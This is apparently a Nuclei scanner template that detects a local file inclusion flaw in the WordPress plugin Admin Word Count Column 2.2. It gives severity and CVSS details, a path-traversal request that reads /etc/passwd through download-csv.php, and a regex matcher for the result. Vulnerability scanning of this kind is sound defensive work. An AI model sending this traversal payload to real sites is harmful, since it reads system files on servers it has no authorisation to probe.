id: admin-word-count-column-lfi

info:
  name: WordPress Admin Word Count Column 2.2 - Local File Inclusion
  author: daffainfo,Splint3r7
  severity: high
  description: WordPress Admin Word Count Column 2.2 is vulnerable to local file inclusion.
  reference:
    - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
    - https://wordpress.org/plugins/admin-word-count-column/
  remediation: This plugin has been closed as of March 29, 2022 and is not available for download.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi,wp

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/01
